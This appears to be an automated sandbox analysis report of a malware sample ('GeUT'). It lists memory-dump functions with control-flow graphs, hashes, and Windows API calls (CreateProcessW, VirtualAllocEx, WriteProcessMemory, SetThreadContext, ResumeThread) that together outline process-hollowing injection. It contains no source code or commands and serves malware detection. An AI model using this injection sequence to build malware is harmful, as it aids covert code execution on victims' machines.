                                control_flow_graph 645 c54e34-c54ecb 646 c54ee2-c54ef0 645->646 647 c54ecd-c54edf 645->647 648 c54f07-c54f43 646->648 649 c54ef2-c54f04 646->649 647->646 650 c54f45-c54f54 648->650 651 c54f57-c55024 CreateProcessW 648->651 649->648 650->651 655 c55026-c5502c 651->655 656 c5502d-c550ec 651->656 655->656 666 c55122-c5512d 656->666 667 c550ee-c55117 656->667 671 c5512e 666->671 667->666 671->671
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55011
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 72e214fb1ce097bdf6f843e17920d603d792bd3d5250468851a86831566ba60d
                                • Instruction ID: c558cb1fab8efde8a84efa23d8804c4f88fb3d51d6f558bc06f580eb0a9cd44f
                                • Opcode Fuzzy Hash: 72e214fb1ce097bdf6f843e17920d603d792bd3d5250468851a86831566ba60d
                                • Instruction Fuzzy Hash: FF81B075D0026ACFDB25CFA5C840BDEBBF5AF49304F1491AAE508B7260DB709A89CF54
                                Function 00C54024 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 699 c54024-c56f3b 701 c56f52-c56f60 699->701 702 c56f3d-c56f4f 699->702 703 c56f77-c56fb3 701->703 704 c56f62-c56f74 701->704 702->701 705 c56fb5-c56fc4 703->705 706 c56fc7-c57094 CreateProcessW 703->706 704->703 705->706 710 c57096-c5709c 706->710 711 c5709d-c5715c 706->711 710->711 721 c57192-c5719d 711->721 722 c5715e-c57187 711->722 726 c5719e 721->726 722->721 726->726
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57081
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2bc549480d240ac44bbc0165e2aa576893bbe50e69d48f276de8f75a6972efda
                                • Instruction ID: 8fc173756f73f800bd7b64a0c1b3a963e4aa92b5839b5cac3faf27b3be444831
                                • Opcode Fuzzy Hash: 2bc549480d240ac44bbc0165e2aa576893bbe50e69d48f276de8f75a6972efda
                                • Instruction Fuzzy Hash: BB81C274D0026ACFDB20CFA5D880BDDBBF5AB49300F1091AAE508B7250DB709E89CF54
                                Function 00C5614C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 727 c5614c-c57d73 729 c57d75-c57d87 727->729 730 c57d8a-c57d98 727->730 729->730 731 c57daf-c57deb 730->731 732 c57d9a-c57dac 730->732 733 c57ded-c57dfc 731->733 734 c57dff-c57ecc CreateProcessW 731->734 732->731 733->734 738 c57ed5-c57f94 734->738 739 c57ece-c57ed4 734->739 749 c57f96-c57fbf 738->749 750 c57fca-c57fd5 738->750 739->738 749->750 754 c57fd6 750->754 754->754
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57EB9
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 2d57e298dcf2ed8a79aa051dd1b9ce5ffb25f7fe0c18f43ba3a939ad89d7fa85
                                • Instruction ID: 4d0080a6b49adf35dbfa4eb72093baaebf03983939f1975d058cf55364edf40b
                                • Opcode Fuzzy Hash: 2d57e298dcf2ed8a79aa051dd1b9ce5ffb25f7fe0c18f43ba3a939ad89d7fa85
                                • Instruction Fuzzy Hash: 9481C075D0026ACFDB20DFA5D884BEDBBF5BB49300F1091AAE508B7250DB709A89CF54
                                Function 00C57CDC Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 782 c57cdc-c57d73 784 c57d75-c57d87 782->784 785 c57d8a-c57d98 782->785 784->785 786 c57daf-c57deb 785->786 787 c57d9a-c57dac 785->787 788 c57ded-c57dfc 786->788 789 c57dff-c57ecc CreateProcessW 786->789 787->786 788->789 793 c57ed5-c57f94 789->793 794 c57ece-c57ed4 789->794 804 c57f96-c57fbf 793->804 805 c57fca-c57fd5 793->805 794->793 804->805 809 c57fd6 805->809 809->809
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57EB9
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 722f45ce3f73eb8810df913e38c467730be9e0bf06b16a1910e919de76bf5a98
                                • Instruction ID: 4754d2cb9721950cf97e08419458acb088253b16ab02ffc879f7f72f1b4dc0bc
                                • Opcode Fuzzy Hash: 722f45ce3f73eb8810df913e38c467730be9e0bf06b16a1910e919de76bf5a98
                                • Instruction Fuzzy Hash: 5F81C175D00269CFDB20DFA5D884BDDBBB5BB49300F1095AAE508B7260DB709A89CF54
                                Function 00C56EA4 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 755 c56ea4-c56f3b 756 c56f52-c56f60 755->756 757 c56f3d-c56f4f 755->757 758 c56f77-c56fb3 756->758 759 c56f62-c56f74 756->759 757->756 760 c56fb5-c56fc4 758->760 761 c56fc7-c57094 CreateProcessW 758->761 759->758 760->761 765 c57096-c5709c 761->765 766 c5709d-c5715c 761->766 765->766 776 c57192-c5719d 766->776 777 c5715e-c57187 766->777 781 c5719e 776->781 777->776 781->781
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00C57081
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 8009230630932586e0d20e11985312a37a94a42a34c84745a2fa0dbca1b61cec
                                • Instruction ID: 26dcb40e75385a198cc38f12f044f3786631d3aa26799154f90ff20514481fc1
                                • Opcode Fuzzy Hash: 8009230630932586e0d20e11985312a37a94a42a34c84745a2fa0dbca1b61cec
                                • Instruction Fuzzy Hash: 1E81C275D0026ACFDB21CFA5D880BDDBBF5AF49300F1095AAE508B7250DB709A89CF54
                                Function 00C51B9C Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 810 c51b9c-c51c33 812 c51c35-c51c47 810->812 813 c51c4a-c51c58 810->813 812->813 814 c51c6f-c51cab 813->814 815 c51c5a-c51c6c 813->815 816 c51cad-c51cbc 814->816 817 c51cbf-c51d8c CreateProcessW 814->817 815->814 816->817 821 c51d95-c51e54 817->821 822 c51d8e-c51d94 817->822 832 c51e56-c51e7f 821->832 833 c51e8a-c51e95 821->833 822->821 832->833 837 c51e96 833->837 837->837
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C51D79
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 6df91cb7daabcb5213ed5d8d114b71ec3d45703f4c27fc54948e449a5d658f6c
                                • Instruction ID: 98fbd0332751f4bfcaaeb17e6389d8ad1c634246da001ac312dac14d3f97667e
                                • Opcode Fuzzy Hash: 6df91cb7daabcb5213ed5d8d114b71ec3d45703f4c27fc54948e449a5d658f6c
                                • Instruction Fuzzy Hash: 4381D175D00229DFDB21DFA5C884BDDBBB1AF49300F1491AAE908B7260DB719A89CF54
                                Function 00C51BA8 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 838 c51ba8-c51c33 839 c51c35-c51c47 838->839 840 c51c4a-c51c58 838->840 839->840 841 c51c6f-c51cab 840->841 842 c51c5a-c51c6c 840->842 843 c51cad-c51cbc 841->843 844 c51cbf-c51d8c CreateProcessW 841->844 842->841 843->844 848 c51d95-c51e54 844->848 849 c51d8e-c51d94 844->849 859 c51e56-c51e7f 848->859 860 c51e8a-c51e95 848->860 849->848 859->860 864 c51e96 860->864 864->864
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C51D79
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 65a08024cf6e3c8db3bc87fd66c49f0104f3765e68cbefc0fe32742ff517472d
                                • Instruction ID: 09b41b6ae7bcf4c191b8310b7af0e0926c33d335cc3d26b6dc62224d5326d7aa
                                • Opcode Fuzzy Hash: 65a08024cf6e3c8db3bc87fd66c49f0104f3765e68cbefc0fe32742ff517472d
                                • Instruction Fuzzy Hash: 0481C275D00229DFDB21DFA5C884BDDBBF5AB49300F1491AAE908B7260DB709A89CF54
                                Function 00C55C78 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 892 c55c78-c55d03 893 c55d05-c55d17 892->893 894 c55d1a-c55d28 892->894 893->894 895 c55d3f-c55d7b 894->895 896 c55d2a-c55d3c 894->896 897 c55d7d-c55d8c 895->897 898 c55d8f-c55e5c CreateProcessW 895->898 896->895 897->898 902 c55e65-c55f24 898->902 903 c55e5e-c55e64 898->903 913 c55f26-c55f4f 902->913 914 c55f5a-c55f65 902->914 903->902 913->914 917 c55f66 914->917 917->917
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55E49
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 4bba078f5444ebd881b2588c6402fc698e1b5df30b8f03c47ec0e20fbe497439
                                • Instruction ID: 312685a1ff6920cfe4485618ec607135da704d5d3d9ec2f2f6f6cf7c489e2908
                                • Opcode Fuzzy Hash: 4bba078f5444ebd881b2588c6402fc698e1b5df30b8f03c47ec0e20fbe497439
                                • Instruction Fuzzy Hash: 1681C175D0022ADFDF20DFA5C840BDEBBF5AB49300F1091AAE508B7260DB709A89CF54
                                Function 00C54E40 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 865 c54e40-c54ecb 866 c54ee2-c54ef0 865->866 867 c54ecd-c54edf 865->867 868 c54f07-c54f43 866->868 869 c54ef2-c54f04 866->869 867->866 870 c54f45-c54f54 868->870 871 c54f57-c55024 CreateProcessW 868->871 869->868 870->871 875 c55026-c5502c 871->875 876 c5502d-c550ec 871->876 875->876 886 c55122-c5512d 876->886 887 c550ee-c55117 876->887 891 c5512e 886->891 887->886 891->891
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C55011
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: fa356ada74e8a1dc085e4487010c1ef681ab73aff2f3a7d2e8bacdea0bb94def
                                • Instruction ID: f5e2714db34b1c41007bd631f049ab392d4549efa0884d2c05dd08f2baeead90
                                • Opcode Fuzzy Hash: fa356ada74e8a1dc085e4487010c1ef681ab73aff2f3a7d2e8bacdea0bb94def
                                • Instruction Fuzzy Hash: 9681C075D0026ACFDB25CFA5C840BDEBBF5BB49304F1091AAE508B7260DB709A89CF54
                                Function 00C521F0 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C522C6
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 94d4974f9224fb127c6429757aa991a5019d127fa4de082713929393409a3090
                                • Instruction ID: 2434d67331b7cbcc58314f5287be13bcc02f94ba4013e8f4fdb334ccefc6cbce
                                • Opcode Fuzzy Hash: 94d4974f9224fb127c6429757aa991a5019d127fa4de082713929393409a3090
                                • Instruction Fuzzy Hash: B8417AB9D042589FCB00CFAAD984ADEFBF1BB49310F24902AE814B7250D375AA45CF64
                                Function 00C521F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C522C6
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: be6aabda90fca2f0242d6c350c9ac30887de7f5ffbf6a791ec8c449ddc1803c3
                                • Instruction ID: 050698ff7f0330a68892114f5d7d714f00da0a84a2ef007933ea8b60facc9fec
                                • Opcode Fuzzy Hash: be6aabda90fca2f0242d6c350c9ac30887de7f5ffbf6a791ec8c449ddc1803c3
                                • Instruction Fuzzy Hash: 06416AB9D042589FCF10CFA9D984ADEFBF5BB49310F24902AE818B7210D375AA45CF64
                                Function 00C51FD0 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C52085
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 91a8e392b20c1f0f85466e03cec1c84c85b93576012b681c646fb0ea82e05d2b
                                • Instruction ID: 083ad2c60de38929a6fba80f47fd59aa18724ba0d9e8eb6756d5ccca2aceea27
                                • Opcode Fuzzy Hash: 91a8e392b20c1f0f85466e03cec1c84c85b93576012b681c646fb0ea82e05d2b
                                • Instruction Fuzzy Hash: C44186B9D042589FCF10CFAAD884ADEFBB1BB19310F10A02AE814B7250D375A945CF68
                                Function 00C51FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C52085
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: fce4b44213baac6d192d8884e675f158f37aaa1f2161def0941781989b2b7ddd
                                • Instruction ID: eb3b6617a2936301d3c260692a433398d2ac102c3b9236c64983a58ea734143f
                                • Opcode Fuzzy Hash: fce4b44213baac6d192d8884e675f158f37aaa1f2161def0941781989b2b7ddd
                                • Instruction Fuzzy Hash: 913176B9D042589FCF10CFAAD984ADEFBF5BB59310F10A02AE814B7250D375A945CF68
                                Function 00C520E8 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C52195
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: b424277fdb00e081730cc5a7f89f5796f20c4ccef1579775db228e06aa5c9eef
                                • Instruction ID: b265d3d8920ebbf4f5145901f774dbc939e0761956587c0e5c3b7cc36e5874b7
                                • Opcode Fuzzy Hash: b424277fdb00e081730cc5a7f89f5796f20c4ccef1579775db228e06aa5c9eef
                                • Instruction Fuzzy Hash: CC3167B9D002589FCF10CFA9D984ADEFBB1BB49310F10A41AE814B7310D375A945CF68
                                Function 00C520F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C52195
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 7999d3107360e6f9d83c612071a53d3306e43180d2650dcc94367d03d1bac822
                                • Instruction ID: 9fda10edc24e7857bda59a388e364f3d1d268750005497a50cf13d02509a4d54
                                • Opcode Fuzzy Hash: 7999d3107360e6f9d83c612071a53d3306e43180d2650dcc94367d03d1bac822
                                • Instruction Fuzzy Hash: 8D3154B9D042589FCF10CFAAD984A9EFBF5BB09310F10A02AE914B7310D375A945CF69
                                Function 00C51EC1 Relevance: 1.6, APIs: 1, Instructions: 89threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C51F72
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 53241766ef862cd948c9d26df9d2567f6e05d4671543186288229d66843cce77
                                • Instruction ID: a169ad89cab2e0e0cfb37fce982cb9b1695f1cb01e155c10280bc2603386c231
                                • Opcode Fuzzy Hash: 53241766ef862cd948c9d26df9d2567f6e05d4671543186288229d66843cce77
                                • Instruction Fuzzy Hash: BD31ABB4D012589FCB10CFAAD484ADDFBF1BF49314F24912AE814B7210D3785A49CF54
                                Function 00C51EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C51F72
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: babd1a077da3d26f729118c7faced8381848f72dee5ac9b50c3ccf43a998a085
                                • Instruction ID: 085ce75990f29ac88155df46c86e4aca33a3390401499cf1d19f2a0deacbc93a
                                • Opcode Fuzzy Hash: babd1a077da3d26f729118c7faced8381848f72dee5ac9b50c3ccf43a998a085
                                • Instruction Fuzzy Hash: 0F319CB5D012589FCB14CFAAD584ADEFBF1BB49314F24902AE814B7250D378AA45CF64
                                Function 00C52331 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C523AE
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 7ca84258f72ca6eb1ccb5a9de57f40577b7a44af212f3b0d00cf622ec482f9bd
                                • Instruction ID: fa1b48e63d211f788e60b40bf5ec431d15e1f1c1c2c387b0b87471d35a60bd98
                                • Opcode Fuzzy Hash: 7ca84258f72ca6eb1ccb5a9de57f40577b7a44af212f3b0d00cf622ec482f9bd
                                • Instruction Fuzzy Hash: CE21AAB8D002499FCB10CFA9D484ADEFBF4BB49314F24945AE814B7310D375A945CFA4
                                Function 00C52338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                Download Yara Rule
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C523AE
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790724142.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_c50000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 3fba9bffa87ec5b3fd529aa0677131d4d4e7e26a48a7e859ae7548eb88c3184d
                                • Instruction ID: 8e25b7cf04e986e2ae611d797ab4095ced03d0706b353cb5a7b98c07e9695e96
                                • Opcode Fuzzy Hash: 3fba9bffa87ec5b3fd529aa0677131d4d4e7e26a48a7e859ae7548eb88c3184d
                                • Instruction Fuzzy Hash: 57219BB8D002199FCB10CFAAD484ADEFBF4BB49310F24905AE914B7310D375A945CFA4
                                Function 00BAD5B8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790331765.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_bad000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 065e2e2c637e71326a879797438acae331ba279c910b260eaba967c5e94ba3e5
                                • Instruction ID: b6148e27449866c0ba50cc9015bd23bab531fedb500bfde4b502c802ecbe327f
                                • Opcode Fuzzy Hash: 065e2e2c637e71326a879797438acae331ba279c910b260eaba967c5e94ba3e5
                                • Instruction Fuzzy Hash: 722167B1608300DFDB04DF18D9C4B16BFA5FB95324F20C5ADE80A0B646C336D856CBA2
                                Function 00BAD5B3 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1790331765.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_bad000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                • Instruction ID: b86948d591e33f0cf697684fdd4bf7cf569d7e331c03790439d1d248b779e797
                                • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                • Instruction Fuzzy Hash: 0611D376508244CFCF15CF14D5C4B16BFB2FB95324F24C6A9D80A0B656C33AD856CBA1

                                Executed Functions

                                Function 02130D95 Relevance: .5, Instructions: 473COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1819207228.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2130000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e427b5d98d63b929550f215c709c24a3f017f1c76ad36627618d2e416eaac925
                                • Instruction ID: 64b699aa0828b544121361a46adf47e62eae0b2df6f311963b561a4bba994c98
                                • Opcode Fuzzy Hash: e427b5d98d63b929550f215c709c24a3f017f1c76ad36627618d2e416eaac925
                                • Instruction Fuzzy Hash: A5519E746017558FDB26FB74F85C56E7BA2BBDC2413008A6ED406C7264EF309D09EB82
                                Function 02131010 Relevance: .3, Instructions: 252COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1819207228.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2130000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90ce5b80b2e26e677c077dfcf458b902d65ec162d32b716a9239ba098e614216
                                • Instruction ID: 3e2a5d100b076f331ba11543cda6c9af0afddb5bbcfdfe3aa65438d4f232c094
                                • Opcode Fuzzy Hash: 90ce5b80b2e26e677c077dfcf458b902d65ec162d32b716a9239ba098e614216
                                • Instruction Fuzzy Hash: FD91A0347003158FDB15EB74E85CA6E7BE2BFCC241B10856AE506DB3A5EF309D09AB91
                                Function 02131157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1819207228.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2130000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d21e80b2b3044a1315c053ee94bf8710314e057fe797b7adc24672a8903fe6fe
                                • Instruction ID: d1ea6183c0e0aa20b39f5be2393f1a1f53f24706e5565e4314f512ade687cef3
                                • Opcode Fuzzy Hash: d21e80b2b3044a1315c053ee94bf8710314e057fe797b7adc24672a8903fe6fe
                                • Instruction Fuzzy Hash: D031D7323007054BDB65BB79942466E76E3BFC85453408A6EC017DB790EF30DD08ABD2
                                Function 02131860 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1819207228.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2130000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 122e87ad42ad4ed6364015f8ae185dcd825b08bca9f0edd32e357a86373b4501
                                • Instruction ID: 7e56587057dea24f3703bb95791be339f673510512e2231b66b8f968371dbe70
                                • Opcode Fuzzy Hash: 122e87ad42ad4ed6364015f8ae185dcd825b08bca9f0edd32e357a86373b4501
                                • Instruction Fuzzy Hash: 1E21A171B003099FDB14EBBD581876EBAEBEFC8650B10842ED44BD7390DE349C0157A2
                                Function 02130939 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.1819207228.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2130000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4af122c4471e8244d9a0499ba56b388502f5a9b4c0b1fffde2c428a0b9aaff70
                                • Instruction ID: 87322f9a0c055d7b1a45023ae865b0dee5ac6303c66b7e62648421758dc5f4cb
                                • Opcode Fuzzy Hash: 4af122c4471e8244d9a0499ba56b388502f5a9b4c0b1fffde2c428a0b9aaff70
                                • Instruction Fuzzy Hash: 8221C230A45248CFCB55EBB8A8597AD7FF2EF89300F1480AEC449A7292DB705D15DB91
